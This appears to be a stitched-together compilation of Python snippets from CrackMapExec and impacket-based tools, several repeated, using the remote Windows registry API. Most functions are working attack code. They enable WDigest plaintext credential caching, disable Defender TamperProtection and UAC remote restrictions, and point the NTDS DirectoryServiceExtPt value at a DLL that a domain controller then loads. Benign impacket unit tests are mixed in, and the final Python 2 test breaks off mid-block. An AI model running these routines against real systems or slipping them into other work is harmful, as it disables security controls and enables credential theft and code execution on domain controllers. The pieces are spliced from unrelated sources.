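    def enable(self):
        """Set WDigest ``UseLogonCredential`` = 1 (REG_DWORD) on the target via
        the remote registry and log success once the value reads back as 1.

        The DCE/RPC binding is taken from ``RemoteOperations`` through its
        name-mangled private attribute (there is no public accessor) and kept
        on ``self.rrp``.  Defender note: a write to
        ``HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest``
        is the well-known indicator for this tampering and is worth alerting on.
        Teardown of the RemoteOperations session is best-effort; it now swallows
        only ordinary exceptions instead of everything (the bare ``except`` also
        caught KeyboardInterrupt/SystemExit).
        """
        remote_ops = RemoteOperations(self.smbconnection, self.doKerb)
        remote_ops.enableRegistry()
        self.rrp = remote_ops._RemoteOperations__rrp   # name-mangled private attribute

        if self.rrp is not None:
            hklm = rrp.hOpenLocalMachine(self.rrp)['phKey']
            key_handle = rrp.hBaseRegOpenKey(
                self.rrp, hklm,
                'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
            )['phkResult']

            rrp.hBaseRegSetValue(self.rrp, key_handle, 'UseLogonCredential\x00',
                                 rrp.REG_DWORD, 1)

            # Confirm by reading the value back rather than trusting the set call.
            _rtype, data = rrp.hBaseRegQueryValue(self.rrp, key_handle,
                                                  'UseLogonCredential\x00')
            if int(data) == 1:
                self.logger.success(
                    'UseLogonCredential registry key created successfully')

        # Best-effort teardown: narrowed from a bare except.
        try:
            remote_ops.finish()
        except Exception:
            pass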
파일: rdp.py 프로젝트: zyayaa/CrackMapExec
    def rdp_disable(self, context, smbconnection):
        """Disable Remote Desktop on the target by writing
        ``fDenyTSConnections`` = 1 (REG_DWORD) under
        ``HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server`` through
        the remote registry, reporting via ``context.log`` only after the value
        reads back as 1.  The RemoteOperations session is closed best-effort.
        """
        ops = RemoteOperations(smbconnection, False)
        ops.enableRegistry()
        dce = ops._RemoteOperations__rrp   # name-mangled private binding

        if dce:
            hklm = rrp.hOpenLocalMachine(dce)['phKey']
            opened = rrp.hBaseRegOpenKey(
                dce, hklm, 'SYSTEM\\CurrentControlSet\\Control\\Terminal Server')
            ts_key = opened['phkResult']

            rrp.hBaseRegSetValue(dce, ts_key, 'fDenyTSConnections\x00',
                                 rrp.REG_DWORD, 1)

            _, current = rrp.hBaseRegQueryValue(dce, ts_key,
                                                'fDenyTSConnections\x00')
            if int(current) == 1:
                context.log.success('RDP disabled successfully')

        try:
            ops.finish()
        except:
            pass
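    def wdigest_enable(self, context, smbconnection):
        """Set ``UseLogonCredential`` = 1 (REG_DWORD) under the WDigest
        SecurityProviders key via the remote registry and report success
        through ``context.log`` only after the value reads back as 1.

        Defender note: a write to
        ``HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest``
        is the well-known indicator for this tampering and is worth alerting on.
        Teardown of the RemoteOperations session is best-effort; it now swallows
        only ordinary exceptions (the bare ``except`` also caught
        KeyboardInterrupt/SystemExit).
        """
        remote_ops = RemoteOperations(smbconnection, False)
        remote_ops.enableRegistry()
        dce = remote_ops._RemoteOperations__rrp   # name-mangled private attribute

        if dce:
            hklm = rrp.hOpenLocalMachine(dce)['phKey']
            key_handle = rrp.hBaseRegOpenKey(
                dce, hklm,
                'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest'
            )['phkResult']

            rrp.hBaseRegSetValue(dce, key_handle, 'UseLogonCredential\x00',
                                 rrp.REG_DWORD, 1)

            # Confirm by reading the value back rather than trusting the set call.
            _rtype, data = rrp.hBaseRegQueryValue(dce, key_handle,
                                                  'UseLogonCredential\x00')
            if int(data) == 1:
                context.log.success(
                    'UseLogonCredential registry key created successfully')

        # Best-effort teardown: narrowed from a bare except.
        try:
            remote_ops.finish()
        except Exception:
            pass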
def start(remoteName, remoteHost, username, password, dllPath):
    """Point the NTDS ``DirectoryServiceExtPt`` registry value at *dllPath*
    over the remote registry, call ``trigger_samr`` and delete the value again.

    ``remoteName`` is accepted but never used.  Every error path prints a
    ``[x]`` line and returns ``None``; the DCE/RPC connection is never
    explicitly disconnected on any path.  ``trigger_samr`` is defined
    elsewhere in the file.  Defender note: the short-lived appearance of this
    value under ``Services\\NTDS`` is the observable artefact of this routine
    and the place to put a registry-modification alert.
    """

    winreg_bind = r'ncacn_np:445[\pipe\winreg]'   # unused: the pipe is reached via SMBTransport below
    hRootKey = None
    subkey = None
    rrpclient = None

    print("[*] Connecting to remote registry")

    try:
        # SMB transport to the \winreg named pipe on 445.  The trailing empty
        # strings presumably fill impacket's positional domain / LM hash /
        # NT hash / AES key slots — confirm against SMBTransport's signature.
        rpctransport = transport.SMBTransport(remoteHost, 445, r'\winreg',
                                              username, password, "", "", "",
                                              "")
    except (Exception) as e:
        print("[x] Error establishing SMB connection: %s" % e)
        return

    try:
        # Set up winreg RPC
        rrpclient = rpctransport.get_dce_rpc()
        rrpclient.connect()
        rrpclient.bind(rrp.MSRPC_UUID_RRP)
    except (Exception) as e:
        print("[x] Error binding to remote registry: %s" % e)
        return

    print("[*] Connection established")
    # NOTE(review): banner says "...ExtPtr" but the value written below is
    # "DirectoryServiceExtPt" — the banner is the inconsistent one.
    print(
        "[*] Adding new value to SYSTEM\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPtr"
    )

    try:
        # Add a new registry key
        ans = rrp.hOpenLocalMachine(rrpclient)
        hRootKey = ans['phKey']
        subkey = rrp.hBaseRegOpenKey(
            rrpclient, hRootKey, "SYSTEM\\CurrentControlSet\\Services\\NTDS")
        # The value type is the bare literal 1 (REG_SZ's numeric value);
        # rrp.REG_SZ would say the same thing readably.
        rrp.hBaseRegSetValue(rrpclient, subkey["phkResult"],
                             "DirectoryServiceExtPt", 1, dllPath)
    except (Exception) as e:
        print("[x] Error communicating with remote registry: %s" % e)
        return

    print("[*] Registry value created, DLL will be loaded from %s" % (dllPath))

    # Defined elsewhere in the file; any exception it raises propagates and
    # skips the registry cleanup below.
    trigger_samr(remoteHost, username, password)

    print("[*] Removing registry entry")

    try:
        rrp.hBaseRegDeleteValue(rrpclient, subkey["phkResult"],
                                "DirectoryServiceExtPt")
    except (Exception) as e:
        print("[x] Error deleting from remote registry: %s" % e)
        return

    print("[*] All done")
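    def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
        """Round-trip a REG_SZ value through a freshly created key under
        HKEY_CLASSES_ROOT and check the read-back equals what was written.

        The value and the key are deleted before the comparison, so a
        mismatch does not leave residue on the target.  A failing
        ``hBaseRegSetValue`` is only printed; the mismatch then surfaces in
        the final ``assertEqual``.  The local that held the queried type was
        renamed from ``type``, which shadowed the builtin.
        """
        dce, rpctransport, phKey = self.connect()
        resp = rrp.hOpenClassesRoot(dce)
        resp.dump()
        root_handle = resp['phKey']

        resp = rrp.hBaseRegCreateKey(dce, root_handle, 'BETO\x00')
        resp.dump()
        key_handle = resp['phkResult']

        try:
            resp = rrp.hBaseRegSetValue(dce, key_handle, 'BETO2\x00', rrp.REG_SZ,
                                        'HOLA COMO TE VA\x00')
            resp.dump()
        except Exception as e:
            print(e)

        value_type, data = rrp.hBaseRegQueryValue(dce, key_handle, 'BETO2\x00')

        resp = rrp.hBaseRegDeleteValue(dce, key_handle, 'BETO2\x00')
        resp.dump()

        resp = rrp.hBaseRegDeleteKey(dce, root_handle, 'BETO\x00')
        resp.dump()
        self.assertEqual('HOLA COMO TE VA\x00', data)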
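    def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
        """Round-trip a REG_SZ value through a freshly created key under
        HKEY_CLASSES_ROOT and check the read-back equals what was written.

        The value and the key are deleted before the comparison, so a
        mismatch does not leave residue on the target.  ``print(e)`` is used
        instead of the ``print e`` statement so the method parses on both
        Python 2 and 3; the local formerly named ``type`` (shadowing the
        builtin) is now ``value_type``.
        """
        dce, rpctransport, phKey = self.connect()
        resp = rrp.hOpenClassesRoot(dce)
        resp.dump()
        root_handle = resp['phKey']

        resp = rrp.hBaseRegCreateKey(dce, root_handle, 'BETO\x00')
        resp.dump()
        key_handle = resp['phkResult']

        try:
            resp = rrp.hBaseRegSetValue(dce, key_handle, 'BETO2\x00', rrp.REG_SZ,
                                        'HOLA COMO TE VA\x00')
            resp.dump()
        except Exception as e:
            print(e)

        value_type, data = rrp.hBaseRegQueryValue(dce, key_handle, 'BETO2\x00')

        resp = rrp.hBaseRegDeleteValue(dce, key_handle, 'BETO2\x00')
        resp.dump()

        resp = rrp.hBaseRegDeleteKey(dce, root_handle, 'BETO\x00')
        resp.dump()
        self.assertEqual('HOLA COMO TE VA\x00', data)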
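    def disableTamper(self, dce):
        """Write ``TamperProtection`` = 0 (REG_DWORD) under
        ``HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Features`` over the
        remote registry binding *dce*.

        Each RPC step is wrapped separately: failing to open HKLM or to
        create/open the key is logged at debug level and aborts the method;
        a failed value write is logged and reported through ``self.logger``.
        Nothing is returned.  Defender note: a change to this value is a
        high-signal event to alert on.
        """
        try:
            hklm = rrp.hOpenLocalMachine(dce)['phKey']  # handle for HKEY_LOCAL_MACHINE
        except Exception as e:
            logging.debug('Exception thrown when hOpenLocalMachine: %s',
                          str(e))
            return

        try:
            # CreateKey rather than OpenKey — presumably so the call also
            # succeeds when the Features subkey does not exist yet; confirm.
            key_handle = rrp.hBaseRegCreateKey(
                dce, hklm,
                'SOFTWARE\\Microsoft\\Windows Defender\\Features')['phkResult']
        except Exception as e:
            logging.debug('Exception thrown when hBaseRegCreateKey: %s',
                          str(e))
            return

        # TamperProtection
        try:
            rrp.hBaseRegSetValue(dce, key_handle, 'TamperProtection\x00',
                                 rrp.REG_DWORD, 0)
            self.logger.highlight(
                'TamperProtection Key Set! TamperProtection is now off!')
        except Exception as e:
            # The debug line used to say "EnableLUA" (copy-paste from the UAC
            # routine); it now names the value actually being written.
            logging.debug(
                'Exception thrown when hBaseRegSetValue TamperProtection: %s',
                str(e))
            self.logger.error('Could not set TamperProtection Key')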
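    def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
        """Round-trip ``self.test_value_data`` through ``self.test_key`` under
        HKEY_CLASSES_ROOT and check the read-back equals what was written.

        The value and the key are deleted before the comparison, so a
        mismatch does not leave residue on the target.  A failing
        ``hBaseRegSetValue`` is only printed; the mismatch then surfaces in
        the final ``assertEqual``.  The local that held the queried type was
        renamed from ``type``, which shadowed the builtin.
        """
        dce, rpctransport = self.connect()
        resp = rrp.hOpenClassesRoot(dce)
        resp.dump()
        root_handle = resp['phKey']

        resp = rrp.hBaseRegCreateKey(dce, root_handle, self.test_key)
        resp.dump()
        key_handle = resp['phkResult']

        try:
            resp = rrp.hBaseRegSetValue(dce, key_handle, self.test_value_name,
                                        rrp.REG_SZ, self.test_value_data)
            resp.dump()
        except Exception as e:
            print(e)

        value_type, data = rrp.hBaseRegQueryValue(dce, key_handle,
                                                  self.test_value_name)

        resp = rrp.hBaseRegDeleteValue(dce, key_handle, self.test_value_name)
        resp.dump()

        resp = rrp.hBaseRegDeleteKey(dce, root_handle, self.test_key)
        resp.dump()
        self.assertEqual(self.test_value_data, data)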
    def enableUAC(self, dce):
        """Write ``EnableLUA`` = 0 and ``LocalAccountTokenFilterPolicy`` = 1
        (both REG_DWORD) under
        ``HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System``
        over the remote registry binding *dce*.

        Failing to reach HKLM or the policy key is logged at debug level and
        aborts; a failed value write is logged and reported through
        ``self.logger`` but does not stop the remaining write.  Returns None.
        """
        # this actually disables UAC but the key is enable....
        try:
            hklm = rrp.hOpenLocalMachine(dce)['phKey']
        except Exception as exc:
            logging.debug('Exception thrown when hOpenLocalMachine: %s',
                          str(exc))
            return

        try:
            policy_key = rrp.hBaseRegCreateKey(
                dce, hklm,
                'SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
            )['phkResult']
        except Exception as exc:
            logging.debug('Exception thrown when hBaseRegCreateKey: %s',
                          str(exc))
            return

        # (value name, data, success line, debug format, error line) for each
        # write; the messages are kept verbatim so log output is unchanged.
        writes = (
            ('EnableLUA\x00', 0,
             'EnableLUA Key Set!',
             'Exception thrown when hBaseRegSetValue EnableLUA: %s',
             'Could not set EnableLUA Key'),
            ('LocalAccountTokenFilterPolicy\x00', 1,
             'LocalAccountTokenFilterPolicy Key Set!',
             'Exception thrown when hBaseRegSetValue LocalAccountTokenFilterPolicy: %s',
             'Could not set LocalAccountTokenFilterPolicy Key'),
        )
        for value_name, data, ok_line, debug_fmt, err_line in writes:
            try:
                rrp.hBaseRegSetValue(dce, policy_key, value_name,
                                     rrp.REG_DWORD, data)
                self.logger.highlight(ok_line)
            except Exception as exc:
                logging.debug(debug_fmt, str(exc))
                self.logger.error(err_line)
    def add(self, dce, keyName):
        """Create the subkey *keyName* (when no ``-v`` value name was given)
        or set one value under it (when ``-v``/``-vt``/``-vd`` were given),
        over the remote registry binding *dce*.

        The outcome is only printed; an ``ErrorCode`` of 0 in the RPC reply
        is treated as success.  A value type that is not an ``rrp`` attribute
        of the form ``REG_*`` raises a bare ``Exception``.  ``__strip_root_key``
        and ``READ_CONTROL`` come from elsewhere in the file.
        """
        hRootKey, subKey = self.__strip_root_key(dce, keyName)

        # READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY should be equal to KEY_WRITE (0x20006)
        if self.__options.v is None: # Try to create subkey
            subKeyCreate = subKey
            # Parent path: everything but the last backslash-separated component.
            subKey = '\\'.join(subKey.split('\\')[:-1])

            # NOTE(review): the parent is opened but ans2 is never used; the
            # create below goes through hRootKey with the full path.  Presumably
            # this acts as an access/existence check on the parent — confirm.
            ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,
                                       samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY)

            # Should I use ans2?

            ans3 = rrp.hBaseRegCreateKey(
                dce, hRootKey, subKeyCreate,
                samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY
            )
            if ans3['ErrorCode'] == 0:
                print('Successfully set subkey %s' % (
                    keyName
                ))
            else:
                print('Error 0x%08x while creating subkey %s' % (
                    ans3['ErrorCode'], keyName
                ))

        else: # Try to set value of key
            ans2 = rrp.hBaseRegOpenKey(dce, hRootKey, subKey,
                                       samDesired=READ_CONTROL | rrp.KEY_SET_VALUE | rrp.KEY_CREATE_SUB_KEY)


            # Resolve e.g. "REG_DWORD" to rrp.REG_DWORD; the startswith guard
            # keeps an arbitrary rrp attribute name from passing as a type.
            dwType = getattr(rrp, self.__options.vt, None)

            if dwType is None or not self.__options.vt.startswith('REG_'):
                raise Exception('Error parsing value type %s' % self.__options.vt)

            #Fix (?) for packValue function
            # DWORD/QWORD types take an int; int() without a base is decimal
            # only, so input such as 0x10 is rejected with ValueError.
            if dwType in (
                rrp.REG_DWORD, rrp.REG_DWORD_BIG_ENDIAN, rrp.REG_DWORD_LITTLE_ENDIAN,
                rrp.REG_QWORD, rrp.REG_QWORD_LITTLE_ENDIAN
            ):
                valueData = int(self.__options.vd)
            else:
                valueData = self.__options.vd

            ans3 = rrp.hBaseRegSetValue(
                dce, ans2['phkResult'], self.__options.v, dwType, valueData
            )

            if ans3['ErrorCode'] == 0:
                print('Successfully set key %s\\%s of type %s to value %s' % (
                    keyName, self.__options.v, self.__options.vt, valueData
                ))
            else:
                print('Error 0x%08x while setting key %s\\%s of type %s to value %s' % (
                    ans3['ErrorCode'], keyName, self.__options.v, self.__options.vt, valueData
                ))
    def wdigest_enable(self, context, smbconnection):
        """Write ``UseLogonCredential`` = 1 (REG_DWORD) under the WDigest
        SecurityProviders key through the remote registry and report success
        via ``context.log`` once the value reads back as 1.  The
        RemoteOperations session is closed best-effort on the way out.
        """
        ops = RemoteOperations(smbconnection, False)
        ops.enableRegistry()
        binding = ops._RemoteOperations__rrp   # name-mangled private attribute

        if binding:
            hklm = rrp.hOpenLocalMachine(binding)['phKey']
            wdigest = rrp.hBaseRegOpenKey(
                binding, hklm,
                'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest',
            )['phkResult']

            rrp.hBaseRegSetValue(binding, wdigest, 'UseLogonCredential\x00',
                                 rrp.REG_DWORD, 1)

            _, current = rrp.hBaseRegQueryValue(binding, wdigest,
                                                'UseLogonCredential\x00')
            if int(current) == 1:
                context.log.success('UseLogonCredential registry key created successfully')

        try:
            ops.finish()
        except:
            pass
    def enable(self):
        """Set WDigest ``UseLogonCredential`` on the target via the remote
        registry and log success when the read-back equals 1.

        The RRP binding is kept on ``self.rrp`` (reached through the
        name-mangled private attribute of ``RemoteOperations``).  Teardown is
        best-effort and the bare ``except`` swallows everything, including
        KeyboardInterrupt.  Defender note: a write to
        ``HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest``
        is the well-known indicator for this tampering.
        """
        remoteOps = RemoteOperations(self.smbconnection, self.doKerb)
        remoteOps.enableRegistry()
        self.rrp = remoteOps._RemoteOperations__rrp   # name-mangled private attribute

        if self.rrp is not None:
            ans = rrp.hOpenLocalMachine(self.rrp)
            regHandle = ans['phKey']

            ans = rrp.hBaseRegOpenKey(self.rrp, regHandle, 'SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest')
            keyHandle = ans['phkResult']

            # NOTE(review): the DWORD data is passed as the 2-byte string
            # '\x01\x00' here, whereas the other variants of this routine on
            # this page pass the int 1; whether rrp's value packing accepts a
            # str for REG_DWORD is not visible from this file — confirm.
            rrp.hBaseRegSetValue(self.rrp, keyHandle, 'UseLogonCredential\x00',  rrp.REG_DWORD, '\x01\x00')

            # Read-back is the only success signal used.
            rtype, data = rrp.hBaseRegQueryValue(self.rrp, keyHandle, 'UseLogonCredential\x00')

            if int(data) == 1:
                self.logger.success('UseLogonCredential registry key created successfully')

        try:
            remoteOps.finish()
        except:
            pass
    def test_hBaseRegCreateKey_hBaseRegSetValue_hBaseRegDeleteKey(self):
        dce, rpctransport, phKey = self.connect()
        resp = rrp.hOpenClassesRoot(dce)
        #resp.dump()
        regHandle = resp['phKey']

        resp = rrp.hBaseRegCreateKey(dce, regHandle, 'BETO\x00')
        #resp.dump()
        phKey = resp['phkResult']

        try:
            resp = rrp.hBaseRegSetValue(dce, phKey, 'BETO2\x00', rrp.REG_SZ,
                                        'HOLA COMO TE VA\x00')
            #resp.dump()
        except Exception, e:
            print e